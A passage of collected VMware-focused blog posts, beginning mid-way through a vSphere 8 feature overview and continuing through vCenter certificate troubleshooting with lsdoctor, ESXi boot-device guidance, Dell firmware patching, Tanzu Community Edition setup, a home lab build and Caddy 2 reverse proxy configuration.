|---|---|---|
| vCPU per VM | 768 | 768 |
| Memory per VM | 24 TB | 24 TB |
| vGPU per VM | 4 | 8 |
| CPU per host | 896 | 896 |
| Memory per host | 24 TB | 24 TB |
| Hosts managed by vLCM | 400 | 1000 |
| Hosts per cluster | 96 | 96 |
| VMs per cluster | 8000 | 10000 |
| VMDirectPath I/O devices per host | 8 | 32 |

Enhanced DRS Performance # Some updates have also been made to Dynamic Resource Scheduling (DRS):
- vSphere Memory Monitoring and Remediation v2 (vMMR2)
  - Supports Intel® Optane PMem
  - Better distribution of L3 cache prefetch data on DRAM and PMem
  - Uses Memory Stats for better VM placement
Security # There have also been some improvements when it comes to security in vSphere 8:
- Improvements to Intel® Software Guard Extensions (SGX)³
- TLS 1.2 & better cipher suites are now the default
- Prevent Untrusted Binaries
  - Basically, VMkernel.Boot.execInstalledOnly is now the default, preventing untrusted binaries from running on an ESXi host unless this setting is explicitly changed. As this is one of the most common ransomware attack vectors, this is a welcome change to the defaults.
Always check the VMware vSphere 8 Security Configuration Guide for updated security information.
Closing Comments # All in all, vSphere 8 looks like a good incremental release, with a bunch of useful enhancements and new features. There are no really huge game-changing features in the release, perhaps with the exception of the vSphere Distributed Services Engine. It is clear that we are moving more and more towards specialized silicon for specific tasks. GPUs and DPUs are gaining momentum! Truthfully, we have had things like iSCSI and TCP Offloading (TOE) for a long time, but this goes beyond that.
DSE enables software on the host to actively use the processing power of a DPU, much like what is done with GPUs. Going forward I expect to see more services move over to such a model; perhaps things like vSAN can use this technology as well. For now DSE does not support VMkernel ports, so at the time of writing this is not possible, but I’m sure that is something that is being actively worked on. Once we have VMkernel support on DPUs, we might also see vCenter management of non-ESXi hosts for bare-metal (sic) workloads. Specialized silicon for specialized workloads really makes sense to me; not everything needs to be x86 after all. Other than that, this release feels like an evolutionary one — which makes a lot of sense. vSphere is still the de facto on-premises datacenter standard, and this release continues to build on that. In my opinion, the real news in vSphere 8 is vSAN 8 and its new architecture model! Check core.vmware.com/vsphere for all the details; there should be info about vSphere 8 there already — if not, it’s right around the corner.
Resources # Last updated 01. september 2022.
- VMware: vSphere 8 Sneak Peek with Raghu Raghuram (YouTube)
- VMware: Introducing vSphere 8: The Enterprise Workload Platform
- VMware: What’s New with vSphere 8 Core Storage
- VMware: What’s New in vSphere 8?
- VMware: DPU-based Acceleration for NSX: Deep Dive
- Duncan Epping: Introducing vSphere 8!
- Frank Denneman: New vSphere 8 Features for Consistent ML Workload Performance
- The Register: VMware reckons 20% of server cores can come back to work thanks to vSphere 8 and SmartNICs
Footnotes #
1. The rise of DPUs in the Infrastructure ↩︎
2. vSphere Lifecycle Manager Baselines and Images ↩︎
3. Intel® Software Guard Extensions ↩︎
--- # Expired VMware vCenter certificates URL: https://vNinja.net/2022/08/08/expired-vmware-vcenter-7-certificates/ Date: 2022-08-08 Author: stine Tags: ESXi, VMware, vSphere, vCenter, PKI, TLS, Certificate
AKA Something fishy in a sea of red herrings # Last week, I worked with a customer on what was seemingly a straightforward VMware vCenter 7 certificate replacement job, but encountered several red herrings that also turned out to be issues that needed solving. I thought I’d share these in this post, in the hope that they can help others in the future. The initial issue was that during the summer holidays, the customer’s certificates had expired, and they were presented with “Error 503, service unavailable” messages when trying to log into the vSphere Client. While renewing certificates with certificate-manager in the vCenter BASH shell via SSH, the services got stuck at 85%, and then failed to start after several minutes. The first thing I checked was that the time was set correctly; if the time is incorrect, it can cause several issues. Since we were able to log into the vCenter Server Appliance Management Interface (VAMI), I was able to check that the NTP source was set up and that there were no issues. This can also be done in the vCenter BASH shell via SSH by using the command ntp.get to check the configured NTP source, and the command date. I also checked whether the STS certificate had expired. I then checked if there was enough disk space with df -h. After confirming that the services were still getting stuck at 85% after a reboot of the vCenter, I checked the certificate manager log, which you can find here: /var/log/vmware/vmcad/certificate-manager.log.
In the log, I could see that there were inconsistencies in how the Fully Qualified Domain Name (FQDN) of the vCenter was written, and there were errors pointing to problems with the Subject Alternative Name (SAN). Since I was unsure what was written in the old certificate, I had a look in the BACKUP_STORE using /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store BACKUP_STORE --text | less, and compared it to the input that was used when renewing the certificate. However, after correcting the new certificate, we were still stuck at 85%. A colleague of mine had experienced a similar issue in his home lab and shared his notes with me, which pointed to the Primary Network Identifier (PNID) not being present in the certificate. I checked this by comparing the output of /usr/lib/vmware-vmafd/bin/vmafd-cli get-pnid --server-name localhost with the certificate and the local hostname of the vCenter. None of these were written in the same case (some being lowercase and others in caps). I also used the vSphere Diagnostics Fling to make sure. I then used the PNID as the master and changed the hostname with the VAMI network configuration tool. After all of this, I was confident that I had found the error, but it was still stuck at 85% after resetting the certificates. I then tried resetting the Security Token Service (STS) certificate and replacing all the certificates through certificate-manager, but no luck. After a dive through all the logs imaginable, and man, does vCenter have a lot of log files, I found an error in vpxd.log which said, “Unable to get certificates from the store APPLMGMT_PASSWORD”, alongside “Failed to read X509 cert; err: 151441516”. My colleague had also experienced this before and suggested that I run the following commands: grep -Hinr "password error" /var/log/vmware/vmdird/*.log and grep -Hinr "Bind Request" /var/log/vmware/vmdird/*.log. As he expected, there were several “Bind request failed” errors and authentication errors pointing to password errors.
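The case-mismatch comparison described above is easy to get wrong by eye, since a PNID, hostname, and certificate SAN that differ only in case look almost identical. A small Python sketch of the check, with hypothetical stand-in values for the outputs of vmafd-cli get-pnid, the OS hostname, and the certificate SAN (the function name is mine):

```python
def check_names(**names: str) -> list[str]:
    """Compare adjacent name pairs and flag differences, calling out
    case-only mismatches, which are the easiest kind to miss by eye."""
    problems = []
    items = list(names.items())
    for (k1, v1), (k2, v2) in zip(items, items[1:]):
        if v1 != v2:
            kind = "case-only mismatch" if v1.lower() == v2.lower() else "mismatch"
            problems.append(f"{kind}: {k1}={v1!r} vs {k2}={v2!r}")
    return problems

# Hypothetical values: PNID in caps, hostname and SAN in lowercase
print(check_names(pnid="VC01.LOCAL", hostname="vc01.local", cert_san="vc01.local"))
# ["case-only mismatch: pnid='VC01.LOCAL' vs hostname='vc01.local'"]
```

DNS itself is case-insensitive, but as this incident shows, aligning everything to one canonical casing (here, the PNID as the master) removes a whole class of red herrings.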
These pointed to the Administrator user first, so I changed the password using the vdcadmintool, and tried restarting the services with no success. I then tried changing the STS certificate again and a new error appeared, which said: “Error 9234: Authentication to VMware Directory service failed”. Now, the grep commands were showing the password error for the machine account, so I changed that as well. Unfortunately, changing the certificates yet again failed when restarting the services. Following that, we also tried changing the certificates from self-signed to custom, but the services still wouldn’t start. At this point, we contacted VMware support. The advisor from VMware support could tell by the order the services were trying to start up that something was wrong with the certificates, and it pointed to an SSL trust mismatch. This was finally fixed with the lsdoctor tool, and applying the –trustfix parameter to correct the SSL trust values and then restarting the services: Running lsdoctor -l to identify issues # root@vc01 [ /tmp/lsdoctor-master ]# python lsdoctor.py -l ATTENTION: You are running a reporting function. This doesn't make any changes to your environment. You can find the report and logs here: /var/log/vmware/lsdoctor 2022-08-03T12:04:11 INFO main: You are reporting on problems found across the SSO domain in the lookup service. This doesn't make changes. 2022-08-03T12:04:11 INFO live_checkCerts: Checking services for trust mismatches... 2022-08-03T12:04:11 INFO generateReport: Listing lookup service problems found in SSO domain 2022-08-03T12:04:11 ERROR generateReport: default-site\vc01.local (VC 7.0 or CGW) found SSL Trust Mismatch: Please run python ls_doctor.py --trustfix option on this node. 
```
2022-08-03T12:04:11 INFO generateReport: Report generated: /var/log/vmware/lsdoctor/vc01.local-2022-08-03-120411.json
root@NO0137VMVC [ /tmp/lsdoctor-master ]#
```

Running lsdoctor -t or --trustfix to fix the trust issues #

```
root@vc01 [ /tmp/lsdoctor-master ]# python lsdoctor.py -t
WARNING: This script makes permanent changes. Before running, please take *OFFLINE* snapshots of all VC's and PSC's at the SAME TIME. Failure to do so can result in PSC or VC inconsistencies.
Logs can be found here: /var/log/vmware/lsdoctor
2022-08-03T12:04:54 INFO main: You are checking for and fixing SSL trust mismatches in the local SSO site.
NOTE: Please run this script one PSC or VC per SSO site.
Have you taken offline (PSCs and VCs powered down at the same time) snapshots of all nodes in the SSO domain or supported backups?[y/n]y
Provide password for administrator@vm-oss.local:
2022-08-03T12:05:15 INFO __init__: Retrieved services from SSO site: default-site
2022-08-03T12:05:15 INFO findAndFix: Checking services for trust mismatches...
2022-08-03T12:05:15 INFO findAndFix: Attempting to reregister 4de1c858-08a7-43ec-903b-ca8198b08cb4_kv for vc01.local
2022-08-03T12:05:15 INFO findAndFix: Attempting to reregister 0352ce58-1812-47fa-ab3c-db913e8ad484 for vc01.local
2022-08-03T12:05:16 INFO findAndFix: Attempting to reregister f2314a00-e755-46d0-a689-4b7f389aedce for vc01.local
2022-08-03T12:05:16 INFO findAndFix: Attempting to reregister d935f890-87ae-459a-b3e7-3c2fb3ad1ceb for vc01.local
2022-08-03T12:05:16 INFO findAndFix: Attempting to reregister default-site:c8d08fa1-c4c0-4a45-bd70-c725d462ceb9 for vc01.local
2022-08-03T12:05:16 INFO findAndFix: Attempting to reregister 6fb48414-9db1-4c84-80d3-fadc5dbdd4aa for vc01.local
2022-08-03T12:05:16 INFO findAndFix: Attempting to reregister default-site:44b21511-a65b-4fbb-90ca-e01f3a35b16b for vc01.local
2022-08-03T12:05:17 INFO findAndFix: Attempting to reregister c59863c5-c736-4c77-b2da-523e0d3444df for vc01.local
2022-08-03T12:05:17 INFO findAndFix: Attempting to reregister 81f488c3-d975-417d-8341-012e135c1de8 for vc01.local
2022-08-03T12:05:17 INFO findAndFix: Attempting to reregister 71bccc22-085e-4bc9-92ce-c8dafa75d03f for vc01.local
2022-08-03T12:05:17 INFO findAndFix: Attempting to reregister aa296055-6610-4372-96af-b02e2034b320 for vc01.local
2022-08-03T12:05:17 INFO findAndFix: Attempting to reregister a0e44029-8f89-4ba2-aacd-81e690a218d0 for vc01.local
2022-08-03T12:05:18 INFO findAndFix: Attempting to reregister f4174796-4081-4d52-abc0-fc72384e3c08 for vc01.local
2022-08-03T12:05:18 INFO findAndFix: Attempting to reregister 12c24187-9d14-414d-bf73-e5b95e35ee80 for vc01.local
2022-08-03T12:05:18 INFO findAndFix: Attempting to reregister fa2bf3a9-efb7-41c2-88d2-5da0b8537e2e for vc01.local
2022-08-03T12:05:18 INFO findAndFix: Attempting to reregister 113e9a79-53a8-4bac-a098-00f86e6052cd for vc01.local
2022-08-03T12:05:18 INFO findAndFix: Attempting to reregister 1730d264-c24f-4a00-8954-cec9c622a126 for vc01.local
2022-08-03T12:05:19 INFO findAndFix: Attempting to reregister 68b48005-6902-406c-ab83-590aec3436d4 for vc01.local
2022-08-03T12:05:19 INFO findAndFix: Attempting to reregister 4de1c858-08a7-43ec-903b-ca8198b08cb4_authz for vc01.local
2022-08-03T12:05:19 INFO findAndFix: Attempting to reregister 74c3b715-23c4-4a84-bd7a-b4779b0947bc for vc01.local
2022-08-03T12:05:19 INFO findAndFix: Attempting to reregister 53bd1727-8664-4b06-bc5b-25cf77d37e59 for vc01.local
2022-08-03T12:05:20 INFO findAndFix: Attempting to reregister 06c4cd74-6aeb-4380-8c2f-04b8fba64eb2 for vc01.local
2022-08-03T12:05:20 INFO findAndFix: Attempting to reregister 1878c18b-fb06-4e43-b46e-9682c64b40ed for vc01.local
2022-08-03T12:05:20 INFO findAndFix: Attempting to reregister 605f8faa-f7c8-447a-b27b-b8f6e839e41e for vc01.local
2022-08-03T12:05:21 INFO findAndFix: Attempting to reregister 68a74ee0-2a99-43bb-b663-0e649325e8bb for vc01.local
2022-08-03T12:05:21 INFO findAndFix: Attempting to reregister 35d8d394-fc08-4acc-844f-392adbdb86bb for vc01.local
2022-08-03T12:05:21 INFO findAndFix: Attempting to reregister a73f8eba-a5a0-447a-8b81-c557692f7727 for vc01.local
2022-08-03T12:05:22 INFO findAndFix: Attempting to reregister db13ccae-b4fa-4ce1-a2ae-f68e081373ff for vc01.local
2022-08-03T12:05:22 INFO findAndFix: Attempting to reregister a096685e-ef11-4301-9d61-deeea4cced69 for vc01.local
2022-08-03T12:05:22 INFO findAndFix: Attempting to reregister b46c40af-33b8-4e8e-91a2-034b7286e679 for vc01.local
2022-08-03T12:05:22 INFO findAndFix: Attempting to reregister 2dd172a6-64e4-43db-9ee5-1aae64171d91 for vc01.local
2022-08-03T12:05:22 INFO findAndFix: Attempting to reregister 4de1c858-08a7-43ec-903b-ca8198b08cb4 for vc01.local
2022-08-03T12:05:23 INFO findAndFix: Attempting to reregister 77f9c3f9-582f-4570-96ff-6d2efd3f87e5 for vc01.local
2022-08-03T12:05:23 INFO findAndFix: Attempting to reregister a62ce6f2-733e-4ee4-8157-1340f9dec30f for vc01.local
2022-08-03T12:05:23 INFO findAndFix: Attempting to reregister 5d845f2e-8c91-48d4-b5d9-04eb81d3c569 for vc01.local
2022-08-03T12:05:24 INFO findAndFix: Attempting to reregister 739c41fd-f740-4742-8a27-aca98e744296 for vc01.local
2022-08-03T12:05:24 INFO findAndFix: Attempting to reregister default-site:a7622a00-b4a2-41b4-9242-35e58beb7bde for vc01.local
2022-08-03T12:05:24 INFO findAndFix: Attempting to reregister 0a8283c3-706c-4ac7-985d-6bf43dc8b8d7 for vc01.local
2022-08-03T12:05:24 INFO findAndFix: Attempting to reregister 6e77038c-c6f5-4a06-b6a4-e9685fab7ade for vc01.local
2022-08-03T12:05:24 INFO findAndFix: Attempting to reregister ec5e3e40-5226-44c0-bda6-b76a0eb272de for vc01.local
2022-08-03T12:05:25 INFO findAndFix: Attempting to reregister ab5fc7c7-407c-4134-8760-42124d7c3cb3 for vc01.local
2022-08-03T12:05:25 INFO findAndFix: Attempting to reregister 4f2e79de-9b47-4158-bd5e-a53bce45002c for vc01.local
2022-08-03T12:05:25 INFO findAndFix: Attempting to reregister c04bd00d-3a3f-45b3-a307-49e26c380ba0 for vc01.local
2022-08-03T12:05:25 INFO findAndFix: Attempting to reregister ec4c6fbf-bf3f-4594-9064-d9387ea803c3 for vc01.local
2022-08-03T12:05:25 INFO findAndFix: We found 44 mismatch(s) and fixed them :)
2022-08-03T12:05:25 INFO main: Please restart services on all PSC's and VC's when you're done.
```

Once this was done, the services started up again successfully and the vCenter was operational again.
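The final log line asks for a service restart on every node. On the VCSA appliance shell this is done with the standard service-control CLI; a minimal sketch, wrapped in a helper function (note that a full stop/start cycle causes a short vCenter management outage):

```shell
# Restart all vCenter services after the lsdoctor trust fix.
# Run from the VCSA appliance shell; expect a brief management
# outage while the services cycle.
restart_vc_services() {
    service-control --stop --all && service-control --start --all
}
```

Run `restart_vc_services` on each vCenter/PSC node in the SSO domain once the trust fix has completed.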
Checking service status #

```
root@vc01 [ /tmp/lsdoctor-master ]# watch service-control --status --all

Every 2.0s: service-control --status --all          vc01.local: Wed Aug 3 12:16:19 2022

Running:
 applmgmt lookupsvc lwsmd observability observability-vapi pschealth vlcm vmafdd vmcad vmdird vmonapi vmware-analytics vmware-certificateauthority vmware-certificatemanagement vmware-cis-license vmware-content-library vmware-eam vmware-envoy vmware-hvc vmware-infraprofile vmware-perfcharts vmware-pod vmware-postgres-archiver vmware-rhttpproxy vmware-sca vmware-sps vmware-statsmonitor vmware-stsd vmware-topologysvc vmware-trustmanagement vmware-updatemgr vmware-vapi-endpoint vmware-vdtc vmware-vmon vmware-vpostgres vmware-vpxd vmware-vpxd-svcs vmware-vsan-health vmware-vsm vsphere-ui vstats vtsdb wcp
Stopped:
 vmcam vmware-imagebuilder vmware-netdumper vmware-rbd-watchdog vmware-vcha
```

Conclusion #

In conclusion, there was a lot to learn from this issue. Firstly, what might seem like red herrings may very well be underlying problems that also need to be solved. In the end, the final issue was fixed by VMware Support, but without all the troubleshooting steps performed before they were brought on board, the fix might not have been so straightforward. Secondly, certificate issues like this are notoriously hard to troubleshoot, especially given the interdependencies between them and the internal vCenter services. Thirdly, there is no shame in asking for help. As Nick Craver, Principal Software Engineer @ Microsoft, put it:

"Are certs evil?"
"That depends"
"On what?"
"Is there a stronger word than evil?"
— @Nick_Craver@infosec.exchange (@Nick_Craver) April 8, 2022

I would also like to highlight these tools if you have VMware vCenter certificate issues:

- vSphere Diagnostic Tool
- vCert
- Using the 'lsdoctor' Tool (80469)

---

# VMware issues Updated ESXi SD card USB Boot Device Guidance

URL: https://vNinja.net/2022/04/27/updated-esxi-sdcard-usb-boot-device-guidance/
Date: 2022-04-27
Author: christian
Tags: ESXi, VMware, vSphere

VMware has released an updated version of KB85685, SD card/USB boot device revised guidance (85685). Previous versions of this KB stated that SD card / USB boot would be deprecated and unsupported in the next major version of ESXi. This has now changed, as the updated version, dated 27th of April 2022, states the following:

> VMware will continue supporting USB/SD card as a boot device through the 8.0 product release, including the update releases. Both installs and upgrades will be supported on USB/SD cards. The change from the previous guidance is that SD/USB as a standalone device will now be supported on previously certified server platforms.

This is good news, even if the recommendation is still to move away from SD card / USB boot for new hosts. We all know that SD cards in particular are troublesome, as are USB pen drives, but still allowing USB boot in the next major version is great news for home lab users who, like me, often run ESXi from an external SSD connected via USB. As a side note, it's curious that VMware now explicitly mentions version 8.0 in a public KB, given that no information on the next major version has been made publicly available at this time. The KB also outlines how 8.0 will move the entire OSData partition to an available persistent device, and to a RAMDisk should one not be available.
---

# Patching Dell Optiplex 7090 UFF

URL: https://vNinja.net/2022/03/29/patching-dell-optiplex-7090-uff/
Date: 2022-03-29
Author: christian
Tags: vSphere, vSAN, VMware, ESXi, Home Lab, Dell, OptiPlex 7090

My new lab is based on Dell OptiPlex 7090 UFF hosts, and after enabling vSAN on the four node cluster, the first two hosts I set up started having issues, especially with the cache devices. They simply disappear from the host, especially during IO-intensive operations like changing the vSAN policy for a few VMs from RAID-1 to RAID-5. Once the host is rebooted, the device is back in place, seemingly without issues, until the next time it disappears. Strangely, this was not a problem before I configured vSAN, when I only used the same devices as local datastores. The two other hosts in the cluster have not shown any of the same issues, so I suspected it might be a firmware or BIOS issue. The first two hosts were both running BIOS version 1.4.1 and the two other hosts were running 1.5.0. Since 1.8 is the latest version available, upgrading was the natural thing to do. Thankfully the BIOS upgrade is fairly simple: just download the new version from dell.com and follow the instructions. Since I'm running ESXi on these hosts, I updated the BIOS through the BIOS itself, with the upgraded version on a USB stick. This worked just fine, but after getting the hosts updated and back online, I still had the same problem with the disappearing vSAN cache devices. After some further investigation, it turns out that there are a few firmware updates available for my NVMe devices as well. Naturally I did not need the Intel Rapid Storage Technology Driver and Application, but the others on that list looked interesting and could have some bearing on the vSAN cache device issue I am experiencing. The problem with all of these is that Dell has decided that the way to patch them is through Microsoft Windows.
This poses a problem in my lab, since I don't have any Windows instances that have direct access to the underlying hardware. In order to get the firmware patched, I needed to create a new USB boot device and get Windows installed on it before placing my host in maintenance mode and rebooting it into Windows. Luckily I had an old USB HDD lying around that was fit for purpose. Armed with a Windows 10 ISO, I booted up a Windows VM in my vSphere environment and installed WinToUSB inside the VM. I then connected the external USB HDD, via USB passthrough, to the VM and created a Windows installation on the bootable external USB drive. Once that process was done, I copied all my downloaded Dell firmware upgrades to the disk and disconnected it from the VM. After placing the host in maintenance mode to evacuate it, I powered it off, disconnected my ESXi boot disk, replaced it with the new Windows To Go installation, and booted the host with it. Then it was simply a matter of running the updates from the Windows instance and rebooting the host with the ESXi boot device again. Extract the updates from the Dell-provided installer by running

```
filename.exe /s /e=c:\mydir
```

in an elevated Windows command prompt. This makes it much easier to run the updates if you don't have a mouse connected. At this point I'm not sure if the firmware upgrades have actually alleviated the problem or not, but the first indications are that they might not have. If that's the case, I will have to dig deeper to find out if there is anything I can do about it in this very much unsupported environment.
---

# Installing Tanzu Community Edition on vSphere — Some Quick Notes

URL: https://vNinja.net/2022/03/16/tanzu-community-edition-vsphere-notes/
Date: 2022-03-16
Author: christian
Tags: TCE, Tanzu, K8s, Home Lab, vSphere

Installing Tanzu Community Edition (TCE) on vSphere is well documented on the tanzucommunityedition.io site, but I ran into a couple of small quirks when installing it in my home lab.

Bind the installer to the external IP of the bootstrap machine #

The TCE installer offers a browser based installation wizard, but the default command binds the interface to the localhost interface and opens port 8080 in a local browser.

```
tanzu management-cluster create --ui
```

Since I'm using a dedicated bootstrap VM, over ssh, that doesn't really work all that well. Thankfully it's easy to change: just start the installer with this command instead, which also doesn't try to pop a local browser.

```
tanzu management-cluster create --ui --bind <VM IP>:8080 --browser none
```

This binds the installer interface to port 8080 on the vNIC in the VM and makes it available from a browser in the same network.

Pick your distro carefully #

I normally use Ubuntu for all my Linux needs, and decided to do so for the bootstrap machine required to install TCE. After spinning up a new VM from an Ubuntu 21.10 template I already had available, and installing all the Tanzu CLI requirements, it failed bootstrapping the management cluster in vSphere. This was due to Ubuntu 21.10 using cgroup2 by default, something that is currently unsupported in TCE v0.10.0. Note that TCE v0.11.0, currently in RC1, fixes this, and it shouldn't be a problem once that has been released. After messing about with trying to change Docker on Ubuntu 21.10 to use cgroup1 for a while, I decided it was just easier to deploy a new Ubuntu bootstrap VM for this, based on Ubuntu 16.04 — which uses cgroup1 by default.
Once I changed the Ubuntu version and followed the installation guides, I was able to get the TCE management cluster installed in my vSphere environment. Now I just need to figure out how to use it, and start moving some of the container based services I run in my local network over to it. Time to get to work in the new lab!

---

# The Home Lab: 2022 Edition

URL: https://vNinja.net/2022/03/07/the-home-lab-2022-edition/
Date: 2022-03-07
Author: christian
Tags: vSphere, vSAN, VMware, ESXi, Home Lab

Some History #

For years now my so-called home lab has been a single Dell Precision T7500 host, with a total of 24 GB RAM and a few TB of locally attached disks. Not much there in terms of redundancy! I also had a small Synology DS216play and a very old HP MicroServer N36L that I ran FreeNAS on. A few months back, the MicroServer decided to call it quits after many, many years of service (it was released in May 2010!). To replace it I ordered a new Synology DS920+ with 4 x Seagate IronWolf 4TB 3.5" NAS HDDs. In order to rescue my data from my old MicroServer/FreeNAS setup, I had to gut the old Precision T7500, move the disk controller over to it, and then install FreeNAS in order to import the ZFS pool. In fact, I kept the drives in the MicroServer chassis, and just moved the disk controller over to the T7500 and booted it up with FreeNAS. Thankfully I got all 3 TB worth of data copied out of the ZFS pool and onto the new Synology NAS. After that it was just a case of booting up ESXi again on the T7500 and I was back in action. This did however highlight that the home lab environment was in dire need of a complete overhaul. A single ESXi host, with obsolete CPUs, 24 GB of RAM and some local disks, just wasn't cutting it anymore. I couldn't even run a VMware vCenter properly without saturating the entire host, and there was no room for playing around with anything new.
And, let's face it, a home lab that runs Home Assistant, Plex, Pi-Hole and various other services is in reality a production environment! Thankfully my employer Proact has a proper local work lab, so most things I need for work I can test out and play with there, but I still need to do some ad-hoc testing, and nothing beats the possibility of spinning up new things quickly in a local environment. So, I started on a quest to revamp the home lab, exploring different hardware options and looking at the availability of said components.

New Hosts — A Surprising Form Factor #

My new hosts are 4 x Dell OptiPlex 7090 UFF. Yes, the ones designed to be mounted inside the monitor stand of some Dell monitors. They are small and quiet, which is kind of the holy grail when it comes to home labs. Most home labs these days are based on Intel NUCs, but due to the current supply chain issues NUCs were close to impossible to get hold of when I needed new hosts. The OptiPlex 7090s fit the bill, as they are capable of supporting 64 GB RAM and can be equipped with i7-1185G7 (Tiger Lake) CPUs. This, combined with internal M.2 NVMe devices, is definitely quite a few steps up from my old Precision T7500 with actual HDDs, aka spinning rust. These hosts will be running VMware ESXi, naturally, and in order to get the internal Intel Corporation Ethernet Connection (13) I219-LM NIC working, I needed the Community Networking Driver for ESXi Fling in my ESXi image. Since I also have external USB based 2.5 GbE NICs, the USB Network Native Driver for ESXi Fling was also required. Each host also has an external USB enclosure with a 120 GB SSD drive in it, used as the boot medium. While USB boot of ESXi is being deprecated, this is at least a more durable option than booting from an SD card that is prone to dying.
Dell OptiPlex 7090 UFF Host Details #

| Component | Description |
| --- | --- |
| Model | OptiPlex 7090 UFF |
| CPU | 11th Gen Intel(R) Core(TM) i7-1185G7 @ 3.00GHz |
| RAM | 64 GB |
| Storage | 1 x 500 GB M.2 NVMe + 1 x 2 TB M.2 NVMe |
| NIC 0 | On-board Intel Corporation Ethernet Connection (13) I219-LM 1GbE |
| NIC 1 | External Startech USB 3.0 2.5GBase-T |
| Boot device | Kingston A400 SSD 120GB in an ICY BOX IB-235-U3 enclosure |

For now, the physical setup is a bit messy and leaves a lot to be desired in the cable management department, but at least they are operational. Note the ingenious use of velcro to attach the boot devices! Since each host has two M.2 NVMe devices, I can also use these for a vSAN setup, which I'll cover in a later post. I am still waiting for the delivery of some additional Startech USB 3.0 2.5GBase-T NICs before I set that up, as I want to separate out the vSAN and vMotion traffic on the external USB NICs — and I promise to clean up the cables once everything is in place. Another limiting factor right now is that the entire setup runs on a Cisco SG200-26 1 GbE switch, so I'm limited to 1 GbE for the time being. 1 GbE networking for vSAN is unsupported for all-flash setups, but as this is an unsupported home lab environment it will have to do for now. At least until I get my hands on a 2.5 GbE switch that I can use for vMotion and vSAN traffic. Of course, 2.5 GbE is also unsupported (the only supported option for all-flash vSAN is 10 GbE or higher), but it would still be better than 1 GbE. I'll wait and see how vSAN performs on this rig before I do anything. So there it is, my new 4 node ESXi cluster, based on the weird form factor Dell OptiPlex 7090 UFFs! I'm also building a BOM with more details here.
---

# VMware vSphere 7 Update 3c Finally Released

URL: https://vNinja.net/2022/01/29/vsphere-7-update-3c-finally-released/
Date: 2022-01-29
Author: christian
Tags: vSphere, vSAN, VMware, ESXi

Back in November 2021, VMware vSphere 7 Update 3 was released and then ultimately retracted again due to critical issues with the code base and upgrade procedures — for details, see KB article 86398. As of January 27th, VMware vSphere 7 Update 3c is now available for download!

- vSphere ESXi 7 Update 3c Release Notes
- vCenter Server 7 Update 3c Release Notes
- vSphere 7 Update 3c – List of Known Issues and Workarounds

As always, read through the release notes before upgrading your installs. In this release there are some quirks if you are affected by a dual driver conflict with the i40en and i40enu VIBs for the Intel network driver:

> When you start the update or upgrade of your vCenter Server system, an upgrade precheck runs a scan to detect if ESXi hosts of versions potentially affected by the issues around the Intel driver name change exist in your vCenter Server inventory. If the precheck identifies such ESXi hosts, a detailed scan runs to provide a list of all affected hosts, specifying file locations where you can find the list, and providing guidance how to proceed. IMPORTANT: You must first upgrade the list of affected hosts to ESXi 7.0 Update 3c before you continue to upgrade vCenter Server to 7.0 Update 3c. You can upgrade ESXi hosts that you manage with either baselines or a single image, by using the ESXi ISO image with an upgrade baseline or a base image of 7.0 Update 3c respectively. Do not use patch baselines based on the rollup bulletin. If the scan finds no affected hosts, you can continue with the upgrade of vCenter Server first.

The normal procedure is to first upgrade vCenter, and then upgrade the ESXi hosts. In this case, that procedure is reversed if the currently running version is affected by the dual driver issue.
Also note that host upgrades should not be done with patch baselines if that is the case.

---

# Caddy 2: A Couple of Simple Use Cases

URL: https://vNinja.net/2022/01/28/caddy-a-couple-of-use-cases/
Date: 2022-01-28
Author: christian
Tags: Caddy 2, Reverse Proxy

Heard of Caddy? If not, here's a quick intro on how I currently use it. Note that I am barely scratching the surface of what it can do, but I have a couple of simple, yet very handy, use cases for it. First off, what is Caddy 2?

> Caddy 2 is a powerful, enterprise-ready, open source web server with automatic HTTPS written in Go.

Simply put, it's a web server with, amongst other things, automatic TLS certificate support and reverse proxy functionality. The official docs do a good job of explaining how to install it on various operating systems, so head over there for installation details.

Use Case 1: Reverse Proxy with TLS support #

My first use case was to utilize Caddy 2 to provide reverse proxy functionality. I wanted to give plausible.io a go, and running it in a container seemed like a good route. I spun up an Ubuntu VM in my DMZ zone, which is based on my existing Guide: Creating Isolated Networks with Ubiquiti UniFi configuration.

Step 1: Install self-hosted plausible.io #

I followed the plausible.io self-hosting installation guide, and the install was painless and worked right out of the box. By default, plausible.io is available on port 8000 after install.

Step 2: Create public DNS records for plausible.io hostname #

I host DNS for my domains on Cloudflare, so I created a new A record for a host in one of my domains, pointing to the public IP of the Ubuntu VM in my DMZ.

Step 3: Port Forward port 80/443 to the DMZ IP #

Since my DMZ is running private IPs (and I do not have a block of public IPs), I configured my UniFi firewall to port forward ports 80 and 443 to the Ubuntu VM.

Step 4: Configure Caddy 2 #

Finally, we get to the Caddy 2 setup.
I created a Caddyfile with the following config:

```
new_host_name {
    reverse_proxy 127.0.0.1:8000
}
```

Obviously, replace new_host_name with your actual hostname from Step 2. All this config does is tell Caddy to redirect inbound connections on port 80/443 to port 8000 on your localhost, which in this case is the plausible.io container. Once the Caddyfile is in place, start Caddy 2 with `caddy start`. That's where the magic happens: when Caddy detects a public DNS name in its config, it checks the hostname defined in your Caddyfile against the DNS records, and if it's valid, it'll automatically go out to Let's Encrypt and request certificates for the domain (if it's localhost or 127.0.0.1 it will create self-signed certificates). For details on the process, see Automatic HTTPS. This removes all the pain of automating this yourself, or fiddling around with certificates. All you need is a public hostname, and off you go, certificates and all! Once this was done, any requests to the hostname defined in the Caddyfile, on either port 80 or 443, were silently redirected to port 8000, which happens to be the plausible.io container. Obviously, you can run several containers in the same VM (or use other methods; I plan on moving all of this to VMware Tanzu at a later time). Adding access to a new container, via port 80/443, is as simple as copying the host declaration in the Caddyfile, changing the hostname, and restarting Caddy 2.

Use Case 2: Simple HTTPS Static File Server #

I suddenly also had the need to offer a set of files via a web server, also via HTTPS. For details, have a look at this Twitter thread, but the short of it was that newer VMware vCenter updates require HTTPS even if updating from a custom URL. Since I had recently played around with Caddy, I figured this should be something that it could also do. Turns out, it does.

Step 1: Create new hostname in DNS #

I added a new hostname to my DNS provider, like I did in Use Case 1 above.
Step 2: Add new section to Caddyfile #

Since I already had a Caddyfile defined, I added the following section to it:

```
new_host_name {
    root * /static/
    file_server browse
}
```

All this does is serve the files in /static/, with file listings enabled. No other setup was required in my case, as I just wanted the vCenter update bundle available via HTTPS. Since I already had the required port openings (80/443) from my first use case, I didn't have to do anything else to my network or firewall setup.

Serving the files #

I extracted the .zip file I downloaded from VMware and copied the files to /static/7u3c/. Once that was done, I restarted Caddy 2 with the `caddy stop` and `caddy start` commands, and my static files were available, with a valid TLS certificate.

